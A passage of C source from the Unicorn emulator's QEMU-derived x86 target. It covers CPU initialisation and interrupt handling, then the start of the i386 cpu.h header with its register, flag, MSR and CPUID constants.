cpu_set_cpustate_pointers(cpu); env->uc = uc; if (xcc->model) { x86_cpu_load_model(cpu, xcc->model); } } static int64_t x86_cpu_get_arch_id(CPUState *cs) { X86CPU *cpu = X86_CPU(cs); return cpu->apic_id; } static bool x86_cpu_get_paging_enabled(const CPUState *cs) { X86CPU *cpu = X86_CPU(cs); return cpu->env.cr[0] & CR0_PG_MASK; } static void x86_cpu_set_pc(CPUState *cs, vaddr value) { X86CPU *cpu = X86_CPU(cs); cpu->env.eip = value; } static void x86_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { X86CPU *cpu = X86_CPU(cs); cpu->env.eip = tb->pc - tb->cs_base; } int x86_cpu_pending_interrupt(CPUState *cs, int interrupt_request) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; if (interrupt_request & CPU_INTERRUPT_POLL) { return CPU_INTERRUPT_POLL; } if (interrupt_request & CPU_INTERRUPT_SIPI) { return CPU_INTERRUPT_SIPI; } if (env->hflags2 & HF2_GIF_MASK) { if ((interrupt_request & CPU_INTERRUPT_SMI) && !(env->hflags & HF_SMM_MASK)) { return CPU_INTERRUPT_SMI; } else if ((interrupt_request & CPU_INTERRUPT_NMI) && !(env->hflags2 & HF2_NMI_MASK)) { return CPU_INTERRUPT_NMI; } else if (interrupt_request & CPU_INTERRUPT_MCE) { return CPU_INTERRUPT_MCE; } else if ((interrupt_request & CPU_INTERRUPT_HARD) && (((env->hflags2 & HF2_VINTR_MASK) && (env->hflags2 & HF2_HIF_MASK)) || (!(env->hflags2 & HF2_VINTR_MASK) && (env->eflags & IF_MASK && !(env->hflags & HF_INHIBIT_IRQ_MASK))))) { return CPU_INTERRUPT_HARD; } else if ((interrupt_request & CPU_INTERRUPT_VIRQ) && (env->eflags & IF_MASK) && !(env->hflags & HF_INHIBIT_IRQ_MASK)) { return CPU_INTERRUPT_VIRQ; } } return 0; } static bool x86_cpu_has_work(CPUState *cs) { return x86_cpu_pending_interrupt(cs, cs->interrupt_request) != 0; } void x86_update_hflags(CPUX86State *env) { uint32_t hflags; #define HFLAG_COPY_MASK \ ~( HF_CPL_MASK | HF_PE_MASK | HF_MP_MASK | HF_EM_MASK | \ HF_TS_MASK | HF_TF_MASK | HF_VM_MASK | HF_IOPL_MASK | \ HF_OSFXSR_MASK | HF_LMA_MASK | HF_CS32_MASK | \ HF_SS32_MASK | HF_CS64_MASK | 
HF_ADDSEG_MASK) hflags = env->hflags & HFLAG_COPY_MASK; hflags |= (env->segs[R_SS].flags >> DESC_DPL_SHIFT) & HF_CPL_MASK; hflags |= (env->cr[0] & CR0_PE_MASK) << (HF_PE_SHIFT - CR0_PE_SHIFT); hflags |= (env->cr[0] << (HF_MP_SHIFT - CR0_MP_SHIFT)) & (HF_MP_MASK | HF_EM_MASK | HF_TS_MASK); hflags |= (env->eflags & (HF_TF_MASK | HF_VM_MASK | HF_IOPL_MASK)); if (env->cr[4] & CR4_OSFXSR_MASK) { hflags |= HF_OSFXSR_MASK; } if (env->efer & MSR_EFER_LMA) { hflags |= HF_LMA_MASK; } if ((hflags & HF_LMA_MASK) && (env->segs[R_CS].flags & DESC_L_MASK)) { hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_CS64_MASK; } else { hflags |= (env->segs[R_CS].flags & DESC_B_MASK) >> (DESC_B_SHIFT - HF_CS32_SHIFT); hflags |= (env->segs[R_SS].flags & DESC_B_MASK) >> (DESC_B_SHIFT - HF_SS32_SHIFT); if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK) || !(hflags & HF_CS32_MASK)) { hflags |= HF_ADDSEG_MASK; } else { hflags |= ((env->segs[R_DS].base | env->segs[R_ES].base | env->segs[R_SS].base) != 0) << HF_ADDSEG_SHIFT; } } env->hflags = hflags; } static void x86_cpu_common_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { X86CPUClass *xcc = X86_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ xcc->parent_reset = cc->reset; /* overwrite the CPUClass->reset to arch reset: x86_cpu_reset(). */ cc->reset = x86_cpu_reset; cc->has_work = x86_cpu_has_work; cc->do_interrupt = x86_cpu_do_interrupt; cc->cpu_exec_interrupt = x86_cpu_exec_interrupt; cc->set_pc = x86_cpu_set_pc; cc->synchronize_from_tb = x86_cpu_synchronize_from_tb; cc->get_arch_id = x86_cpu_get_arch_id; cc->get_paging_enabled = x86_cpu_get_paging_enabled; cc->asidx_from_attrs = x86_asidx_from_attrs; cc->get_memory_mapping = x86_cpu_get_memory_mapping; cc->get_phys_page_attrs_debug = x86_cpu_get_phys_page_attrs_debug; cc->debug_excp_handler = breakpoint_handler; cc->cpu_exec_enter = x86_cpu_exec_enter; cc->cpu_exec_exit = x86_cpu_exec_exit; cc->tcg_initialize = tcg_x86_init; cc->tlb_fill_cpu = x86_cpu_tlb_fill; } X86CPU *cpu_x86_init(struct uc_struct *uc) { X86CPU *cpu; CPUState *cs; CPUClass *cc; X86CPUClass *xcc; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } if (uc->cpu_model == INT_MAX) { #ifdef TARGET_X86_64 uc->cpu_model = UC_CPU_X86_QEMU64; // qemu64 #else uc->cpu_model = UC_CPU_X86_QEMU32; // qemu32 #endif } else if (uc->cpu_model >= ARRAY_SIZE(builtin_x86_defs)) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = (CPUState *)cpu; cpu->env.cpuid_level_func7 = UINT32_MAX; cpu->env.cpuid_level = UINT32_MAX; cpu->env.cpuid_xlevel = UINT32_MAX; cpu->env.cpuid_xlevel2 = UINT32_MAX; /* init CPUClass */ cpu_class_init(uc, cc); /* init X86CPUClass */ x86_cpu_common_class_init(uc, cc, NULL); /* init X86CPUModel */ /* Ignore X86CPUVersion, X86CPUVersionDefinition. we do not need so many cpu types and their property. version: more typename. x86_cpu_versioned_model_name(). alias: more property. 
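* Unicorn instead binds one fixed X86CPUDefinition per uc->cpu_model value.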
 */
    xcc = &cpu->cc;
    xcc->model = calloc(1, sizeof(*(xcc->model)));
    if (xcc->model == NULL) {
        free(cpu);
        return NULL;
    }

    xcc->model->version = CPU_VERSION_AUTO;
    xcc->model->cpudef = &builtin_x86_defs[uc->cpu_model];
    if (xcc->model->cpudef == NULL) {
        free(xcc->model);
        free(cpu);
        return NULL;
    }

    /* init CPUState */
    cpu_common_initfn(uc, cs);

    /* init X86CPU */
    x86_cpu_initfn(uc, cs);

    /* realize X86CPU */
    x86_cpu_realizefn(uc, cs);

    // init address space
    cpu_address_space_init(cs, 0, cs->memory);

    qemu_init_vcpu(cs);

    /* realize CPUState */
    return cpu;
}
unicorn-2.1.1/qemu/target/i386/cpu.h000066400000000000000000002170551467524106700171040ustar00rootroot00000000000000/*
 * i386 virtual CPU header
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #ifndef I386_CPU_H #define I386_CPU_H #include "sysemu/tcg.h" #include "cpu-qom.h" #include "exec/cpu-defs.h" /* The x86 has a strong memory model with some store-after-load re-ordering */ #define TCG_GUEST_DEFAULT_MO (TCG_MO_ALL & ~TCG_MO_ST_LD) /* Maximum instruction code size */ #define TARGET_MAX_INSN_SIZE 16 /* support for self modifying code even if the modified instruction is close to the modifying instruction */ #define TARGET_HAS_PRECISE_SMC #ifdef TARGET_X86_64 #define I386_ELF_MACHINE EM_X86_64 #define ELF_MACHINE_UNAME "x86_64" #else #define I386_ELF_MACHINE EM_386 #define ELF_MACHINE_UNAME "i686" #endif enum { R_EAX = 0, R_ECX = 1, R_EDX = 2, R_EBX = 3, R_ESP = 4, R_EBP = 5, R_ESI = 6, R_EDI = 7, R_R8 = 8, R_R9 = 9, R_R10 = 10, R_R11 = 11, R_R12 = 12, R_R13 = 13, R_R14 = 14, R_R15 = 15, R_AL = 0, R_CL = 1, R_DL = 2, R_BL = 3, R_AH = 4, R_CH = 5, R_DH = 6, R_BH = 7, }; typedef enum X86Seg { R_ES = 0, R_CS = 1, R_SS = 2, R_DS = 3, R_FS = 4, R_GS = 5, R_LDTR = 6, R_TR = 7, } X86Seg; /* segment descriptor fields */ #define DESC_G_SHIFT 23 #define DESC_G_MASK (1 << DESC_G_SHIFT) #define DESC_B_SHIFT 22 #define DESC_B_MASK (1 << DESC_B_SHIFT) #define DESC_L_SHIFT 21 /* x86_64 only : 64 bit code segment */ #define DESC_L_MASK (1 << DESC_L_SHIFT) #define DESC_AVL_SHIFT 20 #define DESC_AVL_MASK (1 << DESC_AVL_SHIFT) #define DESC_P_SHIFT 15 #define DESC_P_MASK (1 << DESC_P_SHIFT) #define DESC_DPL_SHIFT 13 #define DESC_DPL_MASK (3 << DESC_DPL_SHIFT) #define DESC_S_SHIFT 12 #define DESC_S_MASK (1 << DESC_S_SHIFT) #define DESC_TYPE_SHIFT 8 #define DESC_TYPE_MASK (15 << DESC_TYPE_SHIFT) #define DESC_A_MASK (1 << 8) #define DESC_CS_MASK (1 << 11) /* 1=code segment 0=data segment */ #define DESC_C_MASK (1 << 10) /* code: conforming */ #define DESC_R_MASK (1 << 9) /* code: readable */ #define DESC_E_MASK (1 << 10) /* data: expansion direction */ #define DESC_W_MASK (1 << 9) /* data: writable */ #define DESC_TSS_BUSY_MASK (1 << 9) /* eflags masks */ #define CC_C 0x0001 #define CC_P 0x0004 #define CC_A 0x0010 #define CC_Z 0x0040 #define CC_S 0x0080 #define CC_O 0x0800 #define TF_SHIFT 8 #define IOPL_SHIFT 12 #define VM_SHIFT 17 #define TF_MASK 0x00000100 #define IF_MASK 0x00000200 #define DF_MASK 0x00000400 #define IOPL_MASK 0x00003000 #define NT_MASK 0x00004000 #define RF_MASK 0x00010000 #define VM_MASK 0x00020000 #define AC_MASK 0x00040000 #define VIF_MASK 0x00080000 #define VIP_MASK 0x00100000 #define ID_MASK 0x00200000 /* hidden flags - used internally by qemu to represent additional cpu states. Only the INHIBIT_IRQ, SMM and SVMI are not redundant. We avoid using the IOPL_MASK, TF_MASK, VM_MASK and AC_MASK bit positions to ease oring with eflags. 
*/ /* current cpl */ #define HF_CPL_SHIFT 0 /* true if hardware interrupts must be disabled for next instruction */ #define HF_INHIBIT_IRQ_SHIFT 3 /* 16 or 32 segments */ #define HF_CS32_SHIFT 4 #define HF_SS32_SHIFT 5 /* zero base for DS, ES and SS : can be '0' only in 32 bit CS segment */ #define HF_ADDSEG_SHIFT 6 /* copy of CR0.PE (protected mode) */ #define HF_PE_SHIFT 7 #define HF_TF_SHIFT 8 /* must be same as eflags */ #define HF_MP_SHIFT 9 /* the order must be MP, EM, TS */ #define HF_EM_SHIFT 10 #define HF_TS_SHIFT 11 #define HF_IOPL_SHIFT 12 /* must be same as eflags */ #define HF_LMA_SHIFT 14 /* only used on x86_64: long mode active */ #define HF_CS64_SHIFT 15 /* only used on x86_64: 64 bit code segment */ #define HF_RF_SHIFT 16 /* must be same as eflags */ #define HF_VM_SHIFT 17 /* must be same as eflags */ #define HF_AC_SHIFT 18 /* must be same as eflags */ #define HF_SMM_SHIFT 19 /* CPU in SMM mode */ #define HF_SVME_SHIFT 20 /* SVME enabled (copy of EFER.SVME) */ #define HF_GUEST_SHIFT 21 /* SVM intercepts are active */ #define HF_OSFXSR_SHIFT 22 /* CR4.OSFXSR */ #define HF_SMAP_SHIFT 23 /* CR4.SMAP */ #define HF_IOBPT_SHIFT 24 /* an io breakpoint enabled */ #define HF_MPX_EN_SHIFT 25 /* MPX Enabled (CR4+XCR0+BNDCFGx) */ #define HF_MPX_IU_SHIFT 26 /* BND registers in-use */ #define HF_CPL_MASK (3 << HF_CPL_SHIFT) #define HF_INHIBIT_IRQ_MASK (1 << HF_INHIBIT_IRQ_SHIFT) #define HF_CS32_MASK (1 << HF_CS32_SHIFT) #define HF_SS32_MASK (1 << HF_SS32_SHIFT) #define HF_ADDSEG_MASK (1 << HF_ADDSEG_SHIFT) #define HF_PE_MASK (1 << HF_PE_SHIFT) #define HF_TF_MASK (1 << HF_TF_SHIFT) #define HF_MP_MASK (1 << HF_MP_SHIFT) #define HF_EM_MASK (1 << HF_EM_SHIFT) #define HF_TS_MASK (1 << HF_TS_SHIFT) #define HF_IOPL_MASK (3 << HF_IOPL_SHIFT) #define HF_LMA_MASK (1 << HF_LMA_SHIFT) #define HF_CS64_MASK (1 << HF_CS64_SHIFT) #define HF_RF_MASK (1 << HF_RF_SHIFT) #define HF_VM_MASK (1 << HF_VM_SHIFT) #define HF_AC_MASK (1 << HF_AC_SHIFT) #define HF_SMM_MASK (1 << HF_SMM_SHIFT) #define HF_SVME_MASK (1 << HF_SVME_SHIFT) #define HF_GUEST_MASK (1 << HF_GUEST_SHIFT) #define HF_OSFXSR_MASK (1 << HF_OSFXSR_SHIFT) #define HF_SMAP_MASK (1 << HF_SMAP_SHIFT) #define HF_IOBPT_MASK (1 << HF_IOBPT_SHIFT) #define HF_MPX_EN_MASK (1 << HF_MPX_EN_SHIFT) #define HF_MPX_IU_MASK (1 << HF_MPX_IU_SHIFT) /* hflags2 */ #define HF2_GIF_SHIFT 0 /* if set CPU takes interrupts */ #define HF2_HIF_SHIFT 1 /* value of IF_MASK when entering SVM */ #define HF2_NMI_SHIFT 2 /* CPU serving NMI */ #define HF2_VINTR_SHIFT 3 /* value of V_INTR_MASKING bit */ #define HF2_SMM_INSIDE_NMI_SHIFT 4 /* CPU serving SMI nested inside NMI */ #define HF2_MPX_PR_SHIFT 5 /* BNDCFGx.BNDPRESERVE */ #define HF2_NPT_SHIFT 6 /* Nested Paging enabled */ #define HF2_IGNNE_SHIFT 7 /* Ignore CR0.NE=0 */ #define HF2_GIF_MASK (1 << HF2_GIF_SHIFT) #define HF2_HIF_MASK (1 << HF2_HIF_SHIFT) #define HF2_NMI_MASK (1 << HF2_NMI_SHIFT) #define HF2_VINTR_MASK (1 << HF2_VINTR_SHIFT) #define HF2_SMM_INSIDE_NMI_MASK (1 << HF2_SMM_INSIDE_NMI_SHIFT) #define HF2_MPX_PR_MASK (1 << HF2_MPX_PR_SHIFT) #define HF2_NPT_MASK (1 << HF2_NPT_SHIFT) #define HF2_IGNNE_MASK (1 << HF2_IGNNE_SHIFT) #define CR0_PE_SHIFT 0 #define CR0_MP_SHIFT 1 #define CR0_PE_MASK (1U << 0) #define CR0_MP_MASK (1U << 1) #define CR0_EM_MASK (1U << 2) #define CR0_TS_MASK (1U << 3) #define CR0_ET_MASK (1U << 4) #define CR0_NE_MASK (1U << 5) #define CR0_WP_MASK (1U << 16) #define CR0_AM_MASK (1U << 18) #define CR0_PG_MASK (1U << 31) #define CR4_VME_MASK (1U << 0) #define CR4_PVI_MASK (1U << 1) #define 
CR4_TSD_MASK (1U << 2) #define CR4_DE_MASK (1U << 3) #define CR4_PSE_MASK (1U << 4) #define CR4_PAE_MASK (1U << 5) #define CR4_MCE_MASK (1U << 6) #define CR4_PGE_MASK (1U << 7) #define CR4_PCE_MASK (1U << 8) #define CR4_OSFXSR_SHIFT 9 #define CR4_OSFXSR_MASK (1U << CR4_OSFXSR_SHIFT) #define CR4_OSXMMEXCPT_MASK (1U << 10) #define CR4_LA57_MASK (1U << 12) #define CR4_VMXE_MASK (1U << 13) #define CR4_SMXE_MASK (1U << 14) #define CR4_FSGSBASE_MASK (1U << 16) #define CR4_PCIDE_MASK (1U << 17) #define CR4_OSXSAVE_MASK (1U << 18) #define CR4_SMEP_MASK (1U << 20) #define CR4_SMAP_MASK (1U << 21) #define CR4_PKE_MASK (1U << 22) #define DR6_BD (1 << 13) #define DR6_BS (1 << 14) #define DR6_BT (1 << 15) #define DR6_FIXED_1 0xffff0ff0 #define DR7_GD (1 << 13) #define DR7_TYPE_SHIFT 16 #define DR7_LEN_SHIFT 18 #define DR7_FIXED_1 0x00000400 #define DR7_GLOBAL_BP_MASK 0xaa #define DR7_LOCAL_BP_MASK 0x55 #define DR7_MAX_BP 4 #define DR7_TYPE_BP_INST 0x0 #define DR7_TYPE_DATA_WR 0x1 #define DR7_TYPE_IO_RW 0x2 #define DR7_TYPE_DATA_RW 0x3 #define PG_PRESENT_BIT 0 #define PG_RW_BIT 1 #define PG_USER_BIT 2 #define PG_PWT_BIT 3 #define PG_PCD_BIT 4 #define PG_ACCESSED_BIT 5 #define PG_DIRTY_BIT 6 #define PG_PSE_BIT 7 #define PG_GLOBAL_BIT 8 #define PG_PSE_PAT_BIT 12 #define PG_PKRU_BIT 59 #define PG_NX_BIT 63 #define PG_PRESENT_MASK (1 << PG_PRESENT_BIT) #define PG_RW_MASK (1 << PG_RW_BIT) #define PG_USER_MASK (1 << PG_USER_BIT) #define PG_PWT_MASK (1 << PG_PWT_BIT) #define PG_PCD_MASK (1 << PG_PCD_BIT) #define PG_ACCESSED_MASK (1 << PG_ACCESSED_BIT) #define PG_DIRTY_MASK (1 << PG_DIRTY_BIT) #define PG_PSE_MASK (1 << PG_PSE_BIT) #define PG_GLOBAL_MASK (1 << PG_GLOBAL_BIT) #define PG_PSE_PAT_MASK (1 << PG_PSE_PAT_BIT) #define PG_ADDRESS_MASK 0x000ffffffffff000LL #define PG_HI_RSVD_MASK (PG_ADDRESS_MASK & ~PHYS_ADDR_MASK) #define PG_HI_USER_MASK 0x7ff0000000000000LL #define PG_PKRU_MASK (15ULL << PG_PKRU_BIT) #define PG_NX_MASK (1ULL << PG_NX_BIT) #define PG_ERROR_W_BIT 1 #define PG_ERROR_P_MASK 0x01 #define PG_ERROR_W_MASK (1 << PG_ERROR_W_BIT) #define PG_ERROR_U_MASK 0x04 #define PG_ERROR_RSVD_MASK 0x08 #define PG_ERROR_I_D_MASK 0x10 #define PG_ERROR_PK_MASK 0x20 #define MCG_CTL_P (1ULL<<8) /* MCG_CAP register available */ #define MCG_SER_P (1ULL<<24) /* MCA recovery/new status bits */ #define MCG_LMCE_P (1ULL<<27) /* Local Machine Check Supported */ #define MCE_CAP_DEF (MCG_CTL_P|MCG_SER_P) #define MCE_BANKS_DEF 10 #define MCG_CAP_BANKS_MASK 0xff #define MCG_STATUS_RIPV (1ULL<<0) /* restart ip valid */ #define MCG_STATUS_EIPV (1ULL<<1) /* ip points to correct instruction */ #define MCG_STATUS_MCIP (1ULL<<2) /* machine check in progress */ #define MCG_STATUS_LMCE (1ULL<<3) /* Local MCE signaled */ #define MCG_EXT_CTL_LMCE_EN (1ULL<<0) /* Local MCE enabled */ #define MCI_STATUS_VAL (1ULL<<63) /* valid error */ #define MCI_STATUS_OVER (1ULL<<62) /* previous errors lost */ #define MCI_STATUS_UC (1ULL<<61) /* uncorrected error */ #define MCI_STATUS_EN (1ULL<<60) /* error enabled */ #define MCI_STATUS_MISCV (1ULL<<59) /* misc error reg. valid */ #define MCI_STATUS_ADDRV (1ULL<<58) /* addr reg. 
valid */ #define MCI_STATUS_PCC (1ULL<<57) /* processor context corrupt */ #define MCI_STATUS_S (1ULL<<56) /* Signaled machine check */ #define MCI_STATUS_AR (1ULL<<55) /* Action required */ /* MISC register defines */ #define MCM_ADDR_SEGOFF 0 /* segment offset */ #define MCM_ADDR_LINEAR 1 /* linear address */ #define MCM_ADDR_PHYS 2 /* physical address */ #define MCM_ADDR_MEM 3 /* memory address */ #define MCM_ADDR_GENERIC 7 /* generic */ #define MSR_IA32_TSC 0x10 #define MSR_IA32_APICBASE 0x1b #define MSR_IA32_APICBASE_BSP (1<<8) #define MSR_IA32_APICBASE_ENABLE (1<<11) #define MSR_IA32_APICBASE_EXTD (1 << 10) #define MSR_IA32_APICBASE_BASE (0xfffffU<<12) #define MSR_IA32_FEATURE_CONTROL 0x0000003a #define MSR_TSC_ADJUST 0x0000003b #define MSR_IA32_SPEC_CTRL 0x48 #define MSR_VIRT_SSBD 0xc001011f #define MSR_IA32_PRED_CMD 0x49 #define MSR_IA32_UCODE_REV 0x8b #define MSR_IA32_CORE_CAPABILITY 0xcf #define MSR_IA32_ARCH_CAPABILITIES 0x10a #define ARCH_CAP_TSX_CTRL_MSR (1<<7) #define MSR_IA32_TSX_CTRL 0x122 #define MSR_IA32_TSCDEADLINE 0x6e0 #define FEATURE_CONTROL_LOCKED (1<<0) #define FEATURE_CONTROL_VMXON_ENABLED_OUTSIDE_SMX (1<<2) #define FEATURE_CONTROL_LMCE (1<<20) #define MSR_P6_PERFCTR0 0xc1 #define MSR_IA32_SMBASE 0x9e #define MSR_SMI_COUNT 0x34 #define MSR_MTRRcap 0xfe #define MSR_MTRRcap_VCNT 8 #define MSR_MTRRcap_FIXRANGE_SUPPORT (1 << 8) #define MSR_MTRRcap_WC_SUPPORTED (1 << 10) #define MSR_IA32_SYSENTER_CS 0x174 #define MSR_IA32_SYSENTER_ESP 0x175 #define MSR_IA32_SYSENTER_EIP 0x176 #define MSR_MCG_CAP 0x179 #define MSR_MCG_STATUS 0x17a #define MSR_MCG_CTL 0x17b #define MSR_MCG_EXT_CTL 0x4d0 #define MSR_P6_EVNTSEL0 0x186 #define MSR_IA32_PERF_STATUS 0x198 #define MSR_IA32_MISC_ENABLE 0x1a0 /* Indicates good rep/movs microcode on some processors: */ #define MSR_IA32_MISC_ENABLE_DEFAULT 1 #define MSR_IA32_MISC_ENABLE_MWAIT (1ULL << 18) #define MSR_MTRRphysBase(reg) (0x200 + 2 * (reg)) #define MSR_MTRRphysMask(reg) (0x200 + 2 * (reg) + 1) #define MSR_MTRRphysIndex(addr) ((((addr) & ~1u) - 0x200) / 2) #define MSR_MTRRfix64K_00000 0x250 #define MSR_MTRRfix16K_80000 0x258 #define MSR_MTRRfix16K_A0000 0x259 #define MSR_MTRRfix4K_C0000 0x268 #define MSR_MTRRfix4K_C8000 0x269 #define MSR_MTRRfix4K_D0000 0x26a #define MSR_MTRRfix4K_D8000 0x26b #define MSR_MTRRfix4K_E0000 0x26c #define MSR_MTRRfix4K_E8000 0x26d #define MSR_MTRRfix4K_F0000 0x26e #define MSR_MTRRfix4K_F8000 0x26f #define MSR_PAT 0x277 #define MSR_MTRRdefType 0x2ff #define MSR_CORE_PERF_FIXED_CTR0 0x309 #define MSR_CORE_PERF_FIXED_CTR1 0x30a #define MSR_CORE_PERF_FIXED_CTR2 0x30b #define MSR_CORE_PERF_FIXED_CTR_CTRL 0x38d #define MSR_CORE_PERF_GLOBAL_STATUS 0x38e #define MSR_CORE_PERF_GLOBAL_CTRL 0x38f #define MSR_CORE_PERF_GLOBAL_OVF_CTRL 0x390 #define MSR_MC0_CTL 0x400 #define MSR_MC0_STATUS 0x401 #define MSR_MC0_ADDR 0x402 #define MSR_MC0_MISC 0x403 #define MSR_IA32_RTIT_OUTPUT_BASE 0x560 #define MSR_IA32_RTIT_OUTPUT_MASK 0x561 #define MSR_IA32_RTIT_CTL 0x570 #define MSR_IA32_RTIT_STATUS 0x571 #define MSR_IA32_RTIT_CR3_MATCH 0x572 #define MSR_IA32_RTIT_ADDR0_A 0x580 #define MSR_IA32_RTIT_ADDR0_B 0x581 #define MSR_IA32_RTIT_ADDR1_A 0x582 #define MSR_IA32_RTIT_ADDR1_B 0x583 #define MSR_IA32_RTIT_ADDR2_A 0x584 #define MSR_IA32_RTIT_ADDR2_B 0x585 #define MSR_IA32_RTIT_ADDR3_A 0x586 #define MSR_IA32_RTIT_ADDR3_B 0x587 #define MAX_RTIT_ADDRS 8 #define MSR_EFER 0xc0000080 #define MSR_EFER_SCE (1 << 0) #define MSR_EFER_LME (1 << 8) #define MSR_EFER_LMA (1 << 10) #define MSR_EFER_NXE (1 << 11) #define MSR_EFER_SVME (1 << 12) 
#define MSR_EFER_FFXSR (1 << 14) #define MSR_STAR 0xc0000081 #define MSR_LSTAR 0xc0000082 #define MSR_CSTAR 0xc0000083 #define MSR_FMASK 0xc0000084 #define MSR_FSBASE 0xc0000100 #define MSR_GSBASE 0xc0000101 #define MSR_KERNELGSBASE 0xc0000102 #define MSR_TSC_AUX 0xc0000103 #define MSR_VM_HSAVE_PA 0xc0010117 #define MSR_IA32_BNDCFGS 0x00000d90 #define MSR_IA32_XSS 0x00000da0 #define MSR_IA32_UMWAIT_CONTROL 0xe1 #define MSR_IA32_VMX_BASIC 0x00000480 #define MSR_IA32_VMX_PINBASED_CTLS 0x00000481 #define MSR_IA32_VMX_PROCBASED_CTLS 0x00000482 #define MSR_IA32_VMX_EXIT_CTLS 0x00000483 #define MSR_IA32_VMX_ENTRY_CTLS 0x00000484 #define MSR_IA32_VMX_MISC 0x00000485 #define MSR_IA32_VMX_CR0_FIXED0 0x00000486 #define MSR_IA32_VMX_CR0_FIXED1 0x00000487 #define MSR_IA32_VMX_CR4_FIXED0 0x00000488 #define MSR_IA32_VMX_CR4_FIXED1 0x00000489 #define MSR_IA32_VMX_VMCS_ENUM 0x0000048a #define MSR_IA32_VMX_PROCBASED_CTLS2 0x0000048b #define MSR_IA32_VMX_EPT_VPID_CAP 0x0000048c #define MSR_IA32_VMX_TRUE_PINBASED_CTLS 0x0000048d #define MSR_IA32_VMX_TRUE_PROCBASED_CTLS 0x0000048e #define MSR_IA32_VMX_TRUE_EXIT_CTLS 0x0000048f #define MSR_IA32_VMX_TRUE_ENTRY_CTLS 0x00000490 #define MSR_IA32_VMX_VMFUNC 0x00000491 #define XSTATE_FP_BIT 0 #define XSTATE_SSE_BIT 1 #define XSTATE_YMM_BIT 2 #define XSTATE_BNDREGS_BIT 3 #define XSTATE_BNDCSR_BIT 4 #define XSTATE_OPMASK_BIT 5 #define XSTATE_ZMM_Hi256_BIT 6 #define XSTATE_Hi16_ZMM_BIT 7 #define XSTATE_PKRU_BIT 9 #define XSTATE_FP_MASK (1ULL << XSTATE_FP_BIT) #define XSTATE_SSE_MASK (1ULL << XSTATE_SSE_BIT) #define XSTATE_YMM_MASK (1ULL << XSTATE_YMM_BIT) #define XSTATE_BNDREGS_MASK (1ULL << XSTATE_BNDREGS_BIT) #define XSTATE_BNDCSR_MASK (1ULL << XSTATE_BNDCSR_BIT) #define XSTATE_OPMASK_MASK (1ULL << XSTATE_OPMASK_BIT) #define XSTATE_ZMM_Hi256_MASK (1ULL << XSTATE_ZMM_Hi256_BIT) #define XSTATE_Hi16_ZMM_MASK (1ULL << XSTATE_Hi16_ZMM_BIT) #define XSTATE_PKRU_MASK (1ULL << XSTATE_PKRU_BIT) /* CPUID feature words */ typedef enum FeatureWord { FEAT_1_EDX, /* CPUID[1].EDX */ FEAT_1_ECX, /* CPUID[1].ECX */ FEAT_7_0_EBX, /* CPUID[EAX=7,ECX=0].EBX */ FEAT_7_0_ECX, /* CPUID[EAX=7,ECX=0].ECX */ FEAT_7_0_EDX, /* CPUID[EAX=7,ECX=0].EDX */ FEAT_7_1_EAX, /* CPUID[EAX=7,ECX=1].EAX */ FEAT_8000_0001_EDX, /* CPUID[8000_0001].EDX */ FEAT_8000_0001_ECX, /* CPUID[8000_0001].ECX */ FEAT_8000_0007_EDX, /* CPUID[8000_0007].EDX */ FEAT_8000_0008_EBX, /* CPUID[8000_0008].EBX */ FEAT_C000_0001_EDX, /* CPUID[C000_0001].EDX */ FEAT_KVM, /* CPUID[4000_0001].EAX (KVM_CPUID_FEATURES) */ FEAT_KVM_HINTS, /* CPUID[4000_0001].EDX */ FEAT_HYPERV_EAX, /* CPUID[4000_0003].EAX */ FEAT_HYPERV_EBX, /* CPUID[4000_0003].EBX */ FEAT_HYPERV_EDX, /* CPUID[4000_0003].EDX */ FEAT_HV_RECOMM_EAX, /* CPUID[4000_0004].EAX */ FEAT_HV_NESTED_EAX, /* CPUID[4000_000A].EAX */ FEAT_SVM, /* CPUID[8000_000A].EDX */ FEAT_XSAVE, /* CPUID[EAX=0xd,ECX=1].EAX */ FEAT_6_EAX, /* CPUID[6].EAX */ FEAT_XSAVE_COMP_LO, /* CPUID[EAX=0xd,ECX=0].EAX */ FEAT_XSAVE_COMP_HI, /* CPUID[EAX=0xd,ECX=0].EDX */ FEAT_ARCH_CAPABILITIES, FEAT_CORE_CAPABILITY, FEAT_VMX_PROCBASED_CTLS, FEAT_VMX_SECONDARY_CTLS, FEAT_VMX_PINBASED_CTLS, FEAT_VMX_EXIT_CTLS, FEAT_VMX_ENTRY_CTLS, FEAT_VMX_MISC, FEAT_VMX_EPT_VPID_CAPS, FEAT_VMX_BASIC, FEAT_VMX_VMFUNC, FEATURE_WORDS, } FeatureWord; typedef uint64_t FeatureWordArray[FEATURE_WORDS]; /* cpuid_features bits */ #define CPUID_FP87 (1U << 0) #define CPUID_VME (1U << 1) #define CPUID_DE (1U << 2) #define CPUID_PSE (1U << 3) #define CPUID_TSC (1U << 4) #define CPUID_MSR (1U << 5) #define CPUID_PAE (1U << 6) #define 
